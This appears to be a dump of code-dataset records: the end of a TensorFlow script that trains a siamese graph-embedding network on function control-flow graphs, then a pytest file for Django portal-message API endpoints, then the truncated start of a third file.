in attr_names:\n for pair in samples:\n for i in range(2):\n graph = pair[i]['graph']\n for node_id in graph.nodes:\n attr_names[attr_name].append(graph.nodes[node_id][attr_name])\n attr_avg_std_map = {}\n for attr_name in attr_names:\n attr_avg_std_map[attr_name] = {}\n attr_avg_std_map[attr_name]['avg'] = np.average(attr_names[attr_name])\n attr_avg_std_map[attr_name]['std'] = np.std(attr_names[attr_name])\n if attr_avg_std_map[attr_name]['std'] == 0:\n attr_avg_std_map[attr_name]['std'] = 1\n\n return attr_avg_std_map\n\n\ndef n_hot(max_node_num, ids):\n v = np.zeros(max_node_num)\n if ids is not None:\n np.put(v, ids, 1)\n return v\n\n\ndef get_graph_info_mat(graph, attr_avg_std_map, max_node_num, attributes_dim, emb_size):\n graph = graph['graph']\n neighbors = []\n attributes = []\n\n undir_graph = graph.to_undirected()\n undir_graph = nx.relabel.convert_node_labels_to_integers(undir_graph, first_label=0)\n\n if max_node_num < len(undir_graph):\n raise ValueError('Number of nodes in graph \"{}\" is larger than MaxNodeNum: {} >= MaxNodeNum'.format(undir_graph, len(undir_graph)))\n\n attr_names = ['num_calls', 'num_transfer', 'num_arithmetic', 'num_instructions', 'betweenness_centrality', 'num_offspring', 'num_string', 'num_numeric_constant']\n for idx in range(max_node_num):\n node_id = idx\n if node_id in undir_graph.nodes:\n neighbor_ids = list(undir_graph.neighbors(node_id))\n neighbors.append(n_hot(max_node_num, neighbor_ids))\n attrs = []\n for attr_name in attr_names:\n attrs.append((undir_graph.nodes[node_id][attr_name] - attr_avg_std_map[attr_name]['avg']) / attr_avg_std_map[attr_name]['std'])\n attributes.append(attrs)\n else:\n neighbors.append(n_hot(max_node_num, None))\n attributes.append(np.zeros(attributes_dim))\n return neighbors, attributes, np.zeros((max_node_num, emb_size))\n\n\ndef write_debug_mats(sess, ops, feed_dict, root_dir, sample_pair, information):\n if not os.path.isdir(root_dir):\n raise ValueError('Argument root_dir should be a valid folder.')\n\n W1, W2, P_n = sess.run([ops['W1'], ops['W2'], ops['P_n']])\n u_left, W1_mul_X_left, sigma_output_left = sess.run([ops['u_left'], ops['W1_mul_X_left'], ops['sigma_output_left']], feed_dict)\n u_right, W1_mul_X_right, sigma_output_right = sess.run([ops['u_right'], ops['W1_mul_X_right'], ops['sigma_output_right']], feed_dict)\n\n target_dir = os.path.join(root_dir, information)\n if not os.path.isdir(target_dir):\n os.mkdir(target_dir)\n\n left_dot_path = 
os.path.join(target_dir, sample_pair[0]['identifier'] + '.dot')\n right_dot_path = os.path.join(target_dir, sample_pair[1]['identifier'] + '.dot')\n nx.drawing.nx_pydot.write_dot(sample_pair[0]['graph'], left_dot_path)\n nx.drawing.nx_pydot.write_dot(sample_pair[1]['graph'], right_dot_path)\n subprocess.check_call(['dot', '-Tpng', '-O', left_dot_path])\n subprocess.check_call(['dot', '-Tpng', '-O', right_dot_path])\n np.savetxt(os.path.join(target_dir, 'W1.csv'), W1, delimiter=',')\n np.savetxt(os.path.join(target_dir, 'W2.csv'), W2, delimiter=',')\n np.savetxt(os.path.join(target_dir, 'u_left.csv'), u_left[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'u_right.csv'), u_right[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'W1_X_left.csv'), W1_mul_X_left[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'W1_X_right.csv'), W1_mul_X_right[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'sigma_out_left.csv'), sigma_output_left[0], delimiter=',')\n np.savetxt(os.path.join(target_dir, 'sigma_out_right.csv'), sigma_output_right[0], delimiter=',')\n for i in range(len(P_n)):\n np.savetxt(os.path.join(target_dir, 'P_{}.csv'.format(i)), P_n[i], delimiter=',')\n return\n\n\ndef ask_to_clean_dir(dir_path):\n if len(os.listdir(dir_path)) != 0:\n choice = input('Do you want to delete all the files in the {}? (y/n)'.format(dir_path)).lower()\n if choice == 'y' or choice == 'yes':\n shutil.rmtree(dir_path)\n os.mkdir(dir_path)\n return True\n else:\n print('{} is not empty, it is impossible to update the data inside this folder.'.format(dir_path))\n return False\n return True\n\n\ndef find_tfrecord_for(data_type, search_root):\n return glob.glob('{}/{}*.tfrecord'.format(search_root, data_type))\n\n\ndef parse_example_function(example_proto):\n features = {\n \"label\": tf.FixedLenFeature((), dtype=tf.int64),\n \"neighbors_shape\": tf.FixedLenFeature((2), dtype=tf.int64),\n \"attributes_shape\": tf.FixedLenFeature((2), dtype=tf.int64),\n \"u_init_shape\": tf.FixedLenFeature((2), dtype=tf.int64),\n \"identifier_left\": tf.FixedLenFeature((), dtype=tf.string),\n \"identifier_right\": tf.FixedLenFeature((), dtype=tf.string),\n \"neighbors_l\": tf.VarLenFeature(dtype=tf.float32),\n \"neighbors_r\": tf.VarLenFeature(dtype=tf.float32),\n \"attributes_l\": tf.VarLenFeature(dtype=tf.float32),\n \"attributes_r\": tf.VarLenFeature(dtype=tf.float32),\n \"u_init_l\": tf.VarLenFeature(dtype=tf.float32),\n \"u_init_r\": tf.VarLenFeature(dtype=tf.float32),\n }\n parsed_features = tf.parse_single_example(example_proto, features)\n for feature_name in parsed_features:\n if feature_name in ['label', 'neighbors_shape', 'attributes_shape', 'u_init_shape', 'identifier_left', 'identifier_right']:\n continue\n feature_type = feature_name.rstrip('_r').rstrip('_l')\n parsed_features[feature_name] = tf.sparse_tensor_to_dense(parsed_features[feature_name])\n parsed_features[feature_name] = tf.reshape(parsed_features[feature_name], parsed_features[feature_type + '_shape'])\n return parsed_features[\"neighbors_l\"], parsed_features[\"neighbors_r\"], parsed_features[\"attributes_l\"], parsed_features[\"attributes_r\"], parsed_features[\"u_init_l\"], parsed_features[\"u_init_r\"], parsed_features[\"label\"], parsed_features[\"identifier_left\"], parsed_features[\"identifier_right\"]\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description='Train the graph embedding network for function flow graph.')\n parser.add_argument('TrainingDataDir', help='The path to the directory contains training 
data.')\n parser.add_argument('MODEL_DIR', help='The folder to save the model.')\n parser.add_argument('LOG_DIR', help='The folder to save the model log.')\n parser.add_argument('--LoadModel', dest='LoadModel', help='Load old model in MODEL_DIR.', action='store_true')\n parser.add_argument('--no-LoadModel', dest='LoadModel', help='Do not load old model in MODEL_DIR.', action='store_false')\n parser.set_defaults(LoadModel=False)\n parser.add_argument('--StartIPython', dest='StartIPython', help='Start IPython shell.', action='store_true')\n parser.add_argument('--no-StartIPython', dest='StartIPython', help='Do not start IPython shell.', action='store_false')\n parser.set_defaults(StartIPython=False)\n parser.add_argument('--UpdateModel', dest='UpdateModel', help='Update the model.', action='store_true')\n parser.add_argument('--no-UpdateModel', dest='UpdateModel', help='Do not update the model.', action='store_false')\n parser.set_defaults(UpdateModel=False)\n parser.add_argument('--GPU_ID', type=int, default=0, help='The GPU ID of the GPU card.')\n parser.add_argument('--BatchSize', type=int, default=32, help='Number of step per-epoch.')\n parser.add_argument('--LearningRate', type=float, default=0.0001, help='The learning rate for the model.')\n parser.add_argument('--T', type=int, default=5, help='The T parameter in the model.(How many hops to propagate information to.)')\n parser.add_argument('--AttrDims', type=int, default=8, help='The dimensions of the attributes.')\n parser.add_argument('--MaxNodeNum', type=int, default=200, help='The max number of nodes per ACFG.')\n parser.add_argument('--Epochs', type=int, default=1000, help='The number of epochs to run.')\n parser.add_argument('--NumberOfRelu', type=int, default=2, help='The number of relu layer in the sigma function.')\n parser.add_argument('--EmbeddingSize', type=int, default=64, help='The dimension of the embedding vectors.')\n parser.add_argument('--MaxNumModelToKeep', type=int, default=100, help='The number of model to keep in the saver directory.')\n parser.add_argument('--DebugMatsDir', help='The dimension of the embedding vectors.')\n parser.add_argument('--Debug', dest='Debug', help='Debug mode on.', action='store_true')\n parser.add_argument('--no-Debug', dest='Debug', help='Debug mode off.', action='store_false')\n parser.set_defaults(Debug=False)\n parser.add_argument('--Inference', dest='Inference', help='Inference mode on.', action='store_true')\n parser.add_argument('--no-Inference', dest='Inference', help='Inference mode off.', action='store_false')\n parser.set_defaults(Inference=False)\n parser.add_argument('--TSNE_Mode', dest='TSNE_Mode', help='T-SNE mode on', action='store_true')\n parser.add_argument('--no-TSNE_Mode', dest='TSNE_Mode', help='T-SNE mode off', action='store_false')\n parser.set_defaults(TSNE_Mode=False)\n parser.add_argument('--ShuffleLearningData', dest='ShuffleLearningData', help='Learning data shuffle mode on', action='store_true')\n parser.add_argument('--no-ShuffleLearningData', dest='ShuffleLearningData', help='Learning data shuffle mode off', action='store_false')\n parser.set_defaults(ShuffleLearningData=False)\n parser.add_argument('--TSNE_InputData', help='Data to generate embedding and do T-SNE.')\n parser.add_argument('--TrainingPlk', help='Pickled data to calculate attr_avg_std_map.')\n parser.add_argument('--TF_LOG_LEVEL', default=3, type=int, help='Environment variable to TF_CPP_MIN_LOG_LEVEL')\n args = parser.parse_args()\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\" # 
see issue #152\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = str(args.GPU_ID)\n os.environ['TF_CPP_MIN_LOG_LEVEL'] = str(args.TF_LOG_LEVEL)\n\n attributes_dim = args.AttrDims\n\n if not os.path.isdir(args.MODEL_DIR):\n print('MODEL_DIR folder should be a valid folder.')\n sys.exit(-2)\n elif not args.LoadModel:\n if not ask_to_clean_dir(args.MODEL_DIR):\n sys.exit(-3)\n if not ask_to_clean_dir(args.LOG_DIR):\n sys.exit(-4)\n\n if args.Debug and not args.DebugMatsDir:\n print('DebugMatsDir should be set when Debug mode is on.')\n sys.exit(-6)\n\n with tf.device('/cpu:0'):\n shuffle_seed = tf.placeholder(tf.int64, shape=[])\n train_filenames = find_tfrecord_for('train', args.TrainingDataDir)\n dataset = tf.data.TFRecordDataset(train_filenames)\n dataset = dataset.map(parse_example_function, num_parallel_calls=8)\n dataset = dataset.shuffle(buffer_size=10000, seed=shuffle_seed).batch(args.BatchSize)\n dataset = dataset.prefetch(buffer_size=4000)\n iterator = dataset.make_initializable_iterator()\n next_element = iterator.get_next()\n\n test_filenames = find_tfrecord_for('test', args.TrainingDataDir)\n test_dataset = tf.data.TFRecordDataset(test_filenames)\n test_dataset = test_dataset.map(parse_example_function, num_parallel_calls=8)\n test_dataset = test_dataset.batch(args.BatchSize)\n test_iterator = test_dataset.make_initializable_iterator()\n test_next_element = test_iterator.get_next()\n\n print('Building model graph...... [{}]'.format(str(datetime.now())))\n with tf.device('/cpu:0'):\n global_step = tf.get_variable('global_step', [], initializer=tf.constant_initializer(0), trainable=False)\n\n # Build Training Graph\n neighbors_left = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.MaxNodeNum), name='neighbors_left') # B x N x N\n attributes_left = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, attributes_dim), name='attribute_left') # B x N x d\n u_init_left = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.EmbeddingSize), name='u_init_left') # B x N x p\n\n neighbors_right = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.MaxNodeNum), name='neighbors_right') #B x N x N\n attributes_right = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, attributes_dim), name='attributes_right') # B x N x d\n u_init_right = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.EmbeddingSize), name='u_init_right') # B x N x p\n\n neighbors_test = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.MaxNodeNum), name='neighbors_test')\n attributes_test = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, attributes_dim), name='attributes_test')\n u_init_test = tf.placeholder(tf.float32, shape=(None, args.MaxNodeNum, args.EmbeddingSize), name='u_init_test')\n\n label = tf.placeholder(tf.float32, shape=(None, ), name='label')\n\n with tf.variable_scope(\"siamese\") as scope:\n embedding_network = EmbeddingNetwork(args.NumberOfRelu, args.MaxNodeNum, args.EmbeddingSize, args.AttrDims, args.T)\n graph_emb_left = embedding_network.embed(neighbors_left, attributes_left, u_init_left)\n scope.reuse_variables()\n graph_emb_right = embedding_network.embed(neighbors_right, attributes_right, u_init_right)\n\n norm_emb_left = tf.nn.l2_normalize(graph_emb_left, 1)\n norm_emb_right = tf.nn.l2_normalize(graph_emb_right, 1)\n cos_similarity = tf.reduce_sum(tf.multiply(norm_emb_left, norm_emb_right), 1)\n\n # Paper's Loss\n loss_op = tf.reduce_mean(tf.square(cos_similarity - label))\n accuracy = 
tf.reduce_sum(tf.cast(tf.equal(tf.sign(cos_similarity), label), tf.float32)) / tf.cast(tf.shape(neighbors_left)[0], tf.float32)\n positive_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity), tf.where(tf.equal(label, 1))), 1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, 1)))[0], tf.float32)\n positive_num = tf.shape(tf.where(tf.equal(label, 1)))[0]\n negative_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity), tf.where(tf.equal(label, -1))), -1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, -1)))[0], tf.float32)\n negative_num = tf.shape(tf.where(tf.equal(label, -1)))[0]\n # End of Paper's Loss\n\n # Vic's Loss\n '''\n loss_p = (1+label)*tf.cast(tf.equal(tf.mod(global_step,2),1),tf.float32)*(1-cos_similarity) # loss is the degree\n loss_n = (1-label)*tf.cast(tf.equal(tf.mod(global_step,2),0),tf.float32)*tf.cast(tf.greater(cos_similarity, 0.5),tf.float32)*(1+ cos_similarity-0.5)\n\n # loss_p = (1 + label) * (1 - cos_similarity) # loss is the degree\n # loss_n = (1 - label) * tf.cast(tf.greater(cos_similarity, 0.5), tf.float32) * (1 + cos_similarity - 0.5)\n loss_op = tf.reduce_mean( tf.square(loss_p + loss_n) )\n accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.sign(cos_similarity - 0.5), label), tf.float32)) / tf.cast(tf.shape(neighbors_left)[0], tf.float32)\n positive_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity - 0.5), tf.where(tf.equal(label, 1))), 1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, 1)))[0], tf.float32)\n positive_num = tf.shape(tf.where(tf.equal(label, 1)))[0]\n negative_accuracy = tf.reduce_sum(tf.cast(tf.equal(tf.gather(tf.sign(cos_similarity - 0.5), tf.where(tf.equal(label, -1))), -1), tf.float32)) / tf.cast(tf.shape(tf.where(tf.equal(label, -1)))[0], tf.float32)\n negative_num = tf.shape(tf.where(tf.equal(label, -1)))[0]\n '''\n # End of Vic's Loss\n\n # Debug ops\n bingo = tf.cast(tf.equal(tf.sign(cos_similarity), label), tf.float32)\n correct_idx = tf.where(tf.equal(bingo, 1))\n incorrect_idx = tf.where(tf.equal(bingo, 0))\n\n # Bulid Inference Graph\n graph_emb_inference = embedding_network.embed(neighbors_test, attributes_test, u_init_test)\n norm_graph_emb_inference = tf.nn.l2_normalize(graph_emb_inference, 1)\n\n # This is vic's loss function\n # loss_op = (1 + label) * (-0.5 + tf.sigmoid(tf.reduce_mean(tf.squared_difference(graph_emb_left, graph_emb_right)))) + (1 - label) * tf.square(1 + cos_similarity)\n with tf.name_scope('Accuracy'):\n tf.summary.scalar('accuracy', accuracy)\n tf.summary.scalar('positive_accuracy', positive_accuracy)\n tf.summary.scalar('negative_accuracy', negative_accuracy)\n with tf.name_scope('Cost'):\n tf.summary.scalar('loss', loss_op)\n merged = tf.summary.merge_all()\n\n train_op = tf.train.AdamOptimizer(args.LearningRate).minimize(loss_op, global_step=global_step)\n # train_op = tf.train.GradientDescentOptimizer(args.LearningRate).minimize(loss_op, global_step=global_step)\n\n print('Preparing the data for the model...... 
[{}]'.format(str(datetime.now())))\n if args.TSNE_Mode:\n tsne_data = {'samples': None, 'labels': []}\n tsne_neighbors = []\n tsne_attributes = []\n tsne_u_inits = []\n with open(args.TrainingPlk, 'rb') as f_in:\n data = pickle.load(f_in)\n attr_avg_std_map = normalize_data(data['train']['sample'])\n with open(args.TSNE_InputData, 'rb') as f_in:\n data = pickle.load(f_in)\n for sample in data:\n neighbors, attributes, u_init = get_graph_info_mat(sample, None, args.MaxNodeNum, attributes_dim, args.EmbeddingSize)\n tsne_neighbors.append(neighbors)\n tsne_attributes.append(attributes)\n tsne_u_inits.append(u_init)\n tsne_data['labels'].append(sample['identifier'])\n\n print('Starting the tensorflow session...... [{}]'.format(str(datetime.now())))\n with tf.Session() as sess:\n train_writer = tf.summary.FileWriter(os.path.join(args.LOG_DIR, 'train'), sess.graph)\n saver = tf.train.Saver(max_to_keep=args.MaxNumModelToKeep)\n\n if args.LoadModel:\n print('Loading the stored model...... [{}]'.format(str(datetime.now())))\n states = tf.train.get_checkpoint_state(args.MODEL_DIR)\n saver.restore(sess, states.model_checkpoint_path)\n else:\n init_op = tf.global_variables_initializer()\n sess.run(init_op)\n\n if args.Inference:\n sess.run(iterator.initializer, feed_dict={shuffle_seed: 0})\n id_embs = {}\n from numpy import linalg as LA\n while True:\n try:\n cur_neighbors_ls, cur_neighbors_rs, cur_attributes_ls, cur_attributes_rs, cur_u_init_ls, cur_u_init_rs, cur_labels, identifiers_left, identifiers_right = sess.run(next_element)\n except:\n break\n embs = sess.run(graph_emb_inference, {neighbors_test: cur_neighbors_ls, attributes_test: cur_attributes_ls, u_init_test: cur_u_init_ls})\n for idx, id_ in enumerate(identifiers_left):\n id_embs[id_.decode('utf-8')] = embs[idx]\n embs = sess.run(norm_graph_emb_inference, {neighbors_test: cur_neighbors_rs, attributes_test: cur_attributes_rs, u_init_test: cur_u_init_rs})\n for idx, id_ in enumerate(identifiers_right):\n id_embs[id_.decode('utf-8')] = embs[idx]\n while True:\n choice = input('Please input id for inference: ')\n chosen_emb = id_embs[choice]\n pri = []\n for id_ in id_embs:\n cos_sim = scipy.spatial.distance.cosine(chosen_emb, id_embs[id_])\n pri.append([id_, -(cos_sim - 1)])\n pri.sort(key=lambda x: x[1])\n for i in reversed(pri[-10:]):\n print(i[0], i[1])\n print()\n\n sys.exit(-1)\n\n\n\n if args.StartIPython:\n _start_shell(locals(), globals())\n elif args.TSNE_Mode:\n print('Start in t-SNE mode (Do embeddings for {}) [{}]'.format(args.TSNE_InputData, str(datetime.now())))\n count = 0\n embs = []\n while count < len(data):\n cur_neighbors = tsne_neighbors [count: count + args.BatchSize]\n cur_attributes = tsne_attributes[count: count + args.BatchSize]\n cur_u_inits = tsne_u_inits [count: count + args.BatchSize]\n embs += sess.run(norm_graph_emb_inference, {neighbors_test: cur_neighbors, attributes_test: cur_attributes, u_init_test: cur_u_inits}).tolist()\n count += len(cur_neighbors)\n tsne_data['samples'] = embs\n emb_plk_path = os.path.join(args.LOG_DIR, 'embeddings.plk')\n print('Writing embeddings.plk file to {}...... [{}]'.format(emb_plk_path, str(datetime.now())))\n with open(emb_plk_path, 'wb') as f_out:\n pickle.dump(tsne_data, f_out)\n metadata_path = os.path.join(args.LOG_DIR, 'metadata.tsv')\n print('Writing metadata.csv file to {}...... 
[{}]'.format(metadata_path, str(datetime.now())))\n with open(metadata_path, 'w', newline='') as csvfile:\n csv_writer = csv.writer(csvfile, delimiter='\\t', quotechar='\\'', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow(['dim{}'.format(x) for x in range(args.EmbeddingSize)] + ['id', 'label'])\n out_hash = []\n for idx, emb in enumerate(tsne_data['samples']):\n label = tsne_data['labels'][idx]\n items = label.split(':')\n out_label = '{}:{}:{}'.format(items[0], items[1], items[3])\n if out_label not in out_hash:\n out_hash.append(out_label)\n id_idx = out_hash.index(out_label)\n csv_writer.writerow(emb + [id_idx, '\"{}\"'.format(label)])\n print('Generate embedding vectors successfully. To view the visualization, please run:\\n$ ./create_tsne_projector.py {} {} YOUR_EMBEDDING_LOG_DIR'.format(emb_plk_path, metadata_path))\n else:\n print('Start in training mode. [{}]'.format(str(datetime.now())))\n epoch_loss = float('Inf')\n total_step = int(sess.run(global_step))\n train_acc = 0\n test_acc = 0\n\n test_neighbors_ls = []\n test_neighbors_rs = []\n test_attributes_ls = []\n test_attributes_rs = []\n test_u_init_ls = []\n test_u_init_rs = []\n test_labels = []\n\n\n cur_epoch = 0\n epoch_pos_sum = 0\n epoch_pos_num = 0\n epoch_neg_sum = 0\n epoch_neg_num = 0\n if args.Debug:\n false_count = 0\n sess.run(iterator.initializer, feed_dict={shuffle_seed: cur_epoch})\n print('\\tStart training epoch...... [{}]'.format(str(datetime.now())))\n while True:\n try:\n cur_neighbors_ls, cur_neighbors_rs, cur_attributes_ls, cur_attributes_rs, cur_u_init_ls, cur_u_init_rs, cur_labels, identifiers_left, identifiers_right = sess.run(next_element)\n\n if args.UpdateModel:\n _ = sess.run(train_op, {\n neighbors_left: cur_neighbors_ls, attributes_left: cur_attributes_ls, u_init_left: cur_u_init_ls,\n neighbors_right: cur_neighbors_rs, attributes_right: cur_attributes_rs, u_init_right: cur_u_init_rs,\n label: cur_labels\n })\n\n cos_sim, loss, batch_acc, positive_acc, pos_num, negative_acc, neg_num = sess.run([cos_similarity, loss_op, accuracy, positive_accuracy, positive_num, negative_accuracy, negative_num], {\n neighbors_left: cur_neighbors_ls, attributes_left: cur_attributes_ls, u_init_left: cur_u_init_ls,\n neighbors_right: cur_neighbors_rs, attributes_right: cur_attributes_rs, u_init_right: cur_u_init_rs,\n label: cur_labels\n })\n\n if pos_num != 0:\n epoch_pos_sum += (positive_acc * pos_num)\n epoch_pos_num += pos_num\n if neg_num != 0:\n epoch_neg_sum += (negative_acc * neg_num)\n epoch_neg_num += neg_num\n\n if args.Debug:\n if cur_epoch == 0:\n for cur_neighbors_l, cur_neighbors_r, cur_attributes_l, cur_attributes_r, cur_u_init_l, cur_u_init_r, cur_label, identifier_left, identifier_right in zip(cur_neighbors_ls, cur_neighbors_rs, cur_attributes_ls, cur_attributes_rs, cur_u_init_ls, cur_u_init_rs, cur_labels, identifiers_left, identifiers_right):\n cos_sim, loss, batch_acc, positive_acc, negative_acc = sess.run([cos_similarity, loss_op, accuracy, positive_accuracy, negative_accuracy], {\n neighbors_left: [cur_neighbors_l], attributes_left: [cur_attributes_l], u_init_left: [cur_u_init_l],\n neighbors_right: [cur_neighbors_r], attributes_right: [cur_attributes_r], u_init_right: [cur_u_init_r],\n label: [cur_label]\n })\n if cur_label != np.sign(cos_sim[0]):\n print(cur_label, '#', '{:10.8f}'.format(cos_sim[0]), '#', identifier_left.decode('utf-8'), '#', identifier_right.decode('utf-8'))\n false_count += 1\n else:\n print('False count: ', false_count)\n sys.exit(-1)\n\n sys.stdout.write('Epoch: {:6}, 
BatchLoss: {:8.7f}, TotalStep: {:7}, TrainAcc: {:.4f}, PosAcc: {:.4f}, NegAcc: {:.4f}, TestAcc: {:.4f} \\r'.format(\n cur_epoch , loss , total_step , batch_acc , positive_acc , negative_acc , test_acc))\n sys.stdout.flush()\n\n if args.UpdateModel:\n summary = sess.run(merged, {\n neighbors_left: cur_neighbors_ls, attributes_left: cur_attributes_ls, u_init_left: cur_u_init_ls,\n neighbors_right: cur_neighbors_rs, attributes_right: cur_attributes_rs, u_init_right: cur_u_init_rs,\n label: cur_labels\n })\n train_writer.add_summary(summary, total_step)\n\n total_step = int(sess.run(global_step))\n\n if args.UpdateModel:\n if os.path.isabs(args.MODEL_DIR):\n relative_model_dir = os.path.relpath(args.MODEL_DIR, os.getcwd())\n saver.save(sess, os.path.join(relative_model_dir, 'model.ckpt'), global_step=global_step)\n else:\n saver.save(sess, os.path.join(args.MODEL_DIR, 'model.ckpt'), global_step=global_step)\n except tf.errors.OutOfRangeError:\n sess.run(test_iterator.initializer)\n test_acc_inc = 0\n test_num = 0\n while True:\n try:\n test_neighbors_ls, test_neighbors_rs, test_attributes_ls, test_attributes_rs, test_u_init_ls, test_u_init_rs, test_labels, identifiers_lefts, identifiers_rights = sess.run(test_next_element)\n except tf.errors.OutOfRangeError:\n break\n test_acc = sess.run(accuracy, {\n neighbors_left: test_neighbors_ls, attributes_left : test_attributes_ls, u_init_left : test_u_init_ls,\n neighbors_right: test_neighbors_rs, attributes_right: test_attributes_rs, u_init_right: test_u_init_rs,\n label: test_labels\n })\n test_acc_inc += test_acc * len(test_labels)\n test_num += len(test_labels)\n\n test_acc = test_acc_inc / test_num\n if args.UpdateModel:\n test_acc_summary = tf.Summary()\n test_acc_summary.value.add(tag='Accuracy/test_accuracy', simple_value=test_acc)\n train_writer.add_summary(test_acc_summary, total_step)\n print('Epoch: {:6}, BatchLoss: {:8.7f}, TotalStep: {:7}, TrainAcc: {:.4f}, PosAcc: {:.4f}, NegAcc: {:.4f},TestAcc: {:.4f} '.format(cur_epoch, loss, total_step, (epoch_pos_sum + epoch_neg_sum) / (epoch_pos_num + epoch_neg_num), epoch_pos_sum / epoch_pos_num, epoch_neg_sum / epoch_neg_num, test_acc))\n sys.stdout.flush()\n cur_epoch += 1\n epoch_pos_sum = 0\n epoch_neg_sum = 0\n epoch_pos_num = 0\n epoch_neg_num = 0\n if cur_epoch < args.Epochs:\n sess.run(iterator.initializer, feed_dict={shuffle_seed: cur_epoch})\n else:\n print('Training finished. 
[{}]'.format(str(datetime.now())))\n break\n\n\nif __name__ == '__main__':\n main(sys.argv)\n\n","repo_name":"bdsword/GraphEmb","sub_path":"graph_emb.py","file_name":"graph_emb.py","file_ext":"py","file_size_in_byte":30552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"1667345144","text":"import pytest\nfrom portal.apps.portal_messages.models import IntroMessages, CustomMessageTemplate, CustomMessages\n\n\n@pytest.fixture\ndef intromessage_mock(authenticated_user):\n IntroMessages.objects.create(user=authenticated_user, component=\"HISTORY\", unread=False)\n\n\n\"\"\"\nTest get of \"read\" (not unread) IntroMessages for an authenticated user and\nconfirm that the JSON is coming back as expected.\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_intromessages_get(client, authenticated_user, intromessage_mock):\n response = client.get('/api/portal_messages/intro/')\n data = response.json()\n assert response.status_code == 200\n assert data[\"response\"] == [{\"component\": \"HISTORY\", \"unread\": False}]\n\n\n\"\"\"\nTest get of \"read\" IntroMessages for an unauthenticated user\nUser should be redirected to login\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_intromessages_get_unauthenticated_user(client, regular_user):\n response = client.get('/api/portal_messages/intro/')\n assert response.status_code == 302\n\n\n\"\"\"Test the marking of an IntroMessage as \"read\" by writing to the database \"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_intromessages_put(client, authenticated_user):\n body = {\n 'ACCOUNT': 'True',\n 'ALLOCATIONS': 'True',\n 'APPLICATIONS': 'True',\n 'DASHBOARD': 'True',\n 'DATA': 'True',\n 'HISTORY': 'False',\n 'TICKETS': 'True',\n 'UI': 'True'\n }\n\n response = client.put('/api/portal_messages/intro/',\n content_type=\"application/json\",\n data=body)\n assert response.status_code == 200\n # should be eight rows in the database for the user\n assert len(IntroMessages.objects.all()) == 8\n # let's check to see all rows exist correctly\n for component_name, component_value in body.items():\n correct_status = False\n db_message = IntroMessages.objects.filter(component=component_name)\n if db_message and db_message[0].unread != component_value:\n correct_status = True\n\n assert correct_status\n\n\n@pytest.fixture\ndef custommessagetemplate_mock():\n template = CustomMessageTemplate.objects.create(component='HISTORY', message_type='warning', message='test message', dismissible=True)\n yield template\n\n\n@pytest.fixture\ndef custommessage_mock(authenticated_user, custommessagetemplate_mock):\n message = CustomMessages.objects.create(user=authenticated_user, template=custommessagetemplate_mock)\n yield message\n\n\n\"\"\"\nTest get of \"read\" (not unread) CustomMessages for an authenticated user and\nconfirm that the JSON is coming back as expected.\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_custommessages_get(client, authenticated_user, custommessage_mock, custommessagetemplate_mock):\n response = client.get('/api/portal_messages/custom/')\n data = response.json()\n assert response.status_code == 200\n assert data[\"response\"] == {\n 'messages': [{\n \"template\": {\n 'id': custommessagetemplate_mock.id,\n 'component': 'HISTORY',\n 'message_type': 'warning',\n 'dismissible': True,\n 'message': 'test message'\n },\n \"unread\": True\n }]\n 
}\n\n\n\"\"\"\nTest get of \"read\" CustomMessages for an unauthenticated user\nUser should be redirected to login\n\"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_custommessages_get_unauthenticated_user(client, regular_user):\n response = client.get('/api/portal_messages/custom/')\n assert response.status_code == 302\n\n\n\"\"\"Test the marking of an CustomMessage as \"read\" by writing to the database \"\"\"\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_custommessages_put(client, authenticated_user, custommessage_mock, custommessagetemplate_mock):\n original_message = CustomMessages.objects.get(template__id=custommessagetemplate_mock.id)\n assert original_message.unread is True\n\n body = {\n 'templateId': custommessagetemplate_mock.id,\n 'unread': False\n }\n\n response = client.put('/api/portal_messages/custom/',\n content_type=\"application/json\",\n data=body)\n assert response.status_code == 200\n\n assert len(CustomMessages.objects.all()) == 1\n\n db_message = CustomMessages.objects.get(template__id=body['templateId'])\n # Ensure that it updated the value correctly\n assert db_message.unread == body['unread']\n","repo_name":"TACC/Core-Portal","sub_path":"server/portal/apps/portal_messages/intro_unit_test.py","file_name":"intro_unit_test.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"94"} +{"seq_id":"16053677739","text":"from json import load, dump\nimport logging\nfrom time import time\n\n\ndef get_config() -> dict:\n \"\"\"\n Возвращает словарь с параметрами из конфига\n\n :return:\n \"\"\"\n with open('config.json') as file:\n ans: dict = load(file)\n\n if ans[\"use_local_config\"] is True:\n try:\n with 